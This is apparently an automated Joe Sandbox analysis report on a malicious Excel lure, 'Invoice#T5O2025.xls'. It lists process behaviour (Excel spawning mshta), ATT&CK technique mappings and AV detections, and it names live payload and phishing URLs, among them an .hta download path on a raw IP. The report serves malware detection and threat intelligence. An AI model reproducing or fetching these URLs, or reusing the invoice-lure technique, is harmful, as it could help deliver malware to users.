Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Invoice#T5O2025.xlsStream path 'Workbook' entropy: 7.99903041342 (max. 8.0)
Source: FC530000.0.drStream path 'Workbook' entropy: 7.99545705568 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 726Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Invoice#T5O2025.xls25%VirustotalBrowse
Invoice#T5O2025.xls39%ReversingLabsDocument-Excel.Exploit.TempInj
Invoice#T5O2025.xls100%AviraEXP/TempInj.MN
Invoice#T5O2025.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mall0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s.deemos.com
14.103.79.10
truefalse
    high
    s-part-0017.t-0009.fb-t-msedge.net
    13.107.253.45
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        otelrules.svc.static.microsoft
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://s.deemos.com/fNsCo8xA?&priesthood=tame&quotation=pretty&mallfalse
          • Avira URL Cloud: safe
          unknown
          https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            14.103.79.10
            s.deemos.comChina
            18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
            172.245.119.74
            unknownUnited States
            36352AS-COLOCROSSINGUSfalse
            13.107.246.45
            s-part-0017.t-0009.t-msedge.netUnited States
            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1592495
            Start date and time:2025-01-16 08:30:23 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 56s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
            Run name:Potential for more IOCs and behavior
            Number of analysed new started processes analysed:18
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Invoice#T5O2025.xls
            Detection:MAL
            Classification:mal80.expl.winXLS@6/14@3/3
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 52.109.89.19, 52.109.68.130, 23.209.72.206, 23.209.72.209, 20.189.173.23, 23.212.88.34, 20.189.173.3, 52.149.20.212, 20.190.159.64
            • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, otelrules.afd.azureedge.net, weu-azsc-000.roaming.officeapps.live.com, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, res-1-tls.cdn.office.net, ecs.office.com, e40491.dscg.akamaiedge.net, client.wns.windows.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, onedscolprdwus02.westus.cloudapp.azure.com, frc-azsc-000.odc.officeapps.live.com, uci.cdn.office.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, s-0005.s-msedge.net, config.officeapps.live.com, osiprod-
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Report size getting too big, too many NtSetValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            02:32:30API Interceptor791x Sleep call for process: splwow64.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            14.103.79.10Order.xlsGet hashmaliciousUnknownBrowse
              Order.xlsGet hashmaliciousUnknownBrowse
                Order.xlsGet hashmaliciousUnknownBrowse
                  DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                    DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                      DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                        P-04071A.xlsGet hashmaliciousUnknownBrowse
                          P-04071A.xlsGet hashmaliciousUnknownBrowse
                            P-04071A.xlsGet hashmaliciousUnknownBrowse
                              172.245.119.74Order.xlsGet hashmaliciousUnknownBrowse
                              • 172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta
                              13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                              • nam.dcv.ms/BxPVLH2cz4
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              s.deemos.comOrder.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              P-04071A.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              P-04071A.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              P-04071A.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              s-part-0017.t-0009.t-msedge.netQuotation Sheet.docGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==Get hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              https://yt1s.com/en115Get hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              Subscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.45
                              https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTMLGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.45
                              https://officsccounts.com/Get hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.45
                              https://windsttreamnnet.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.45
                              https://www.emesssages.com/?urid=QyTlFEOMWvDGUZ5NuTEwcsQAq9uusXTlTiiUV_UNfX3LfgVbDW65HSw2eUWnVxn3Z3TwDB0cWifiheGEDHjcg0PTiju0An9QEyWngIpPUi7-1HKUlZGRGhW-Y893C0GaqHPzvSqEu5ekHW5&rg=CUSGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              Play_VM_Now_23sec.htmGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.246.45
                              https://9cjl.enestiveryal.ru/lodfnqw/Get hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              s-part-0017.t-0009.fb-t-msedge.netcotizaci#U00f3n.xlam.xlsxGet hashmaliciousUnknownBrowse
                              • 13.107.253.45
                              https://link.edgepilot.com/s/62bf622f/uVTE_PYEIEirHx_sVIJYBQ?u=https://www.google.com/url?sa=https://r20.rs6.net/tns.jsp?f=t%26rct=j%26q=%26esrc=s%26source=web%26cd=%26cad=rja%26uact=8%26ved=2ahUKEwj_UJK636660tcVNh_0HHcggMUkQFnoECB0QAQ%26url=amp/s/avastroy.by/%2577%2570%252D%2563%256F%256E%2574%2565%256E%2574%252F%2572%2565%2564%252E%2568%2574%256D%256CGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.253.45
                              009.vbeGet hashmaliciousAgentTeslaBrowse
                              • 13.107.253.45
                              download.ps1Get hashmaliciousUnknownBrowse
                              • 13.107.253.45
                              Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.253.45
                              https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3DGet hashmaliciousUnknownBrowse
                              • 13.107.253.45
                              https://www.databreachtoday.com/showOnDemand.php?webinarID=6054&rf=OD_REQUEST;Get hashmaliciousUnknownBrowse
                              • 13.107.253.45
                              https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                              • 13.107.253.45
                              29617afb-25a0-12a3-3c27-9464d2b37792.emlGet hashmaliciousUnknownBrowse
                              • 13.107.253.45
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              MICROSOFT-CORP-MSN-AS-BLOCKUS87.121.112.22-arm-2025-01-16T06_52_38.elfGet hashmaliciousUnknownBrowse
                              • 21.254.101.26
                              87.121.112.22-mips-2025-01-16T06_52_39.elfGet hashmaliciousUnknownBrowse
                              • 52.101.1.164
                              arm7.elfGet hashmaliciousUnknownBrowse
                              • 52.226.248.2
                              i586.elfGet hashmaliciousUnknownBrowse
                              • 22.175.135.231
                              Subscription_Renewal_Invoice_2025_FGHDCS.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 52.98.152.162
                              http://ciiscp.org/wordpress/mail.uu.se.htmlGet hashmaliciousOutlook PhishingBrowse
                              • 20.163.176.101
                              https://www.3656ooo.com:8989/?__&__TWN=3fbb31ee60d8d419a9aefdc35e54697bb1650144547_1200879/Get hashmaliciousUnknownBrowse
                              • 20.239.97.157
                              https://c.3656vip14.cc/Get hashmaliciousUnknownBrowse
                              • 40.81.23.45
                              res.spc.elfGet hashmaliciousUnknownBrowse
                              • 51.120.18.179
                              res.arm.elfGet hashmaliciousUnknownBrowse
                              • 52.158.3.52
                              WORLDPHONE-INASNumberforInterdomainRoutingINOrder.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              P-04071A.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              P-04071A.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              P-04071A.xlsGet hashmaliciousUnknownBrowse
                              • 14.103.79.10
                              AS-COLOCROSSINGUSOrder.xlsGet hashmaliciousUnknownBrowse
                              • 172.245.119.74
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 172.245.119.74
                              Order.xlsGet hashmaliciousUnknownBrowse
                              • 172.245.119.74
